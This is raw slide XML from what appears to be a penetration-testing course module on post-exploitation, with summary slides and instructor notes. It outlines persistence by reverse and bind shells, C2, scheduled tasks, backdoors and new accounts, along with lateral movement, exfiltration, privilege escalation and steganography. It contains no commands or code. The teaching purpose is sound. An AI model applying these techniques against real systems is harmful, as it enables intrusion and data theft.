          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2811941" y="3144508"/>
            <a:ext cx="3390720" cy="1496323"/>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dirty="0"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23077586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057400"/>
            <a:ext cx="8542307" cy="1485900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8.3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AFE8FB"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Performing Post-Exploitation Techniques Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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Performing Post-Exploitation Techniques Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="569344"/>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What Did I Learn in this Module?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F57D77F-0B26-F627-F82D-934E2347436E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3337" y="739150"/>
            <a:ext cx="9031805"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latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>This topic describes various methods of maintaining persistence on a compromised system, the use of shells and C2 systems, and the process of creating additional backdoors and accounts.</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>After compromising a system, persistence can be achieved through several methods, such as creating a bind or reverse shell, manipulating scheduled jobs and tasks, creating custom daemons and processes, creating new users, or creating additional backdoors. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>These measures allow the hacker to take actions like uploading additional tools, performing scans and enumerations, launching brute-force attacks, and performing system manipulation using compromised credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Shells such as bind or reverse shells are software utilities that act as an interface between a user and the operating system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tools like Meterpreter and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> can create these shells. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A bind shell allows an attacker to open a port on the compromised system and wait for a connection, whereas a reverse shell can overcome firewall challenges by allowing the victim's system to initiate a connection to the attacker's system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>C2 systems are often used by attackers to send commands and instructions to compromised systems and can be anything from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>attacker’s system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>a virtual server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>or even cloud services like Dropbox or Twitter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Scheduled jobs and tasks can also be manipulated by an attacker for persistence. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:cs typeface="Calibri"/>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59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1593495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274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: Best Practices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(Cont.) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="64698" y="349370"/>
            <a:ext cx="8855014" cy="4186344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="684213" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="58585B"/>
              </a:buClr>
              <a:buSzPct val="90000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Topic 8.1 (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Explain how to access the scheduled tasks of a Windows system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Encourage the students to access all links on this section.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="684213">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Topic 8.2</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Explain the concepts of lateral movement, sensitive data and data exfiltration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Explain the importance of performing network segmentation testing often to verify that your segmentation strategy is appropriate to protect your network against lateral movement and other post-exploitation attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Explain the concept of living-off-the-land (fileless malware) post-exploitation technique. Illustrate with several examples of living-off-the-land techniques.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ask the students to answer the 8.2.4 Practice about Post Exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Explain the concepts of vertical privilege escalation and horizontal privilege escalation and illustrate with examples.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ask the students to answer the 8.2.6 Practice about Post Exploitation Privilege Escalation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Explain the concept of steganography and show how to hide a message or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> any other content inside an image or a video file using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>steghide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> tool.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ask the students to answer the 8.2.8 Practice about Steganography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Encourage the students to access all links on this section.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="684213">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="684213">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" defTabSz="684213">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35737181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Performing Post-Exploitation Techniques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Summary</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="569344"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="024C69"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>What Did I Learn in this Module?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> (Cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="CaixaDeTexto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F57D77F-0B26-F627-F82D-934E2347436E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3337" y="846980"/>
            <a:ext cx="9139635"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1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Windows, for instance, has commands that allow for the automated execution of tasks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Similarly, custom daemons, processes, and additional backdoors can be created on a victim's system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>If the attacker has administrator (root) access, they can even create additional accounts to maintain access and interaction with the victim system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The concept of lateral movement, also known as pivoting, is a method cyber attackers use after breaching a network to move from one system to another. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The aim is to avoid detection, steal sensitive data, and maintain persistent access for future data exfiltration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>The importance of network segmentation is also highlighted as a preventive measure against such activities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Post-exploitation scanning involves identifying other vulnerable systems within the network. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>This can be done through basic port scans or with tools like Nmap and Metasploit. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Techniques like logging into SMB shares with compromised credentials, creating SMB shares, and using remote access protocols are also discussed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
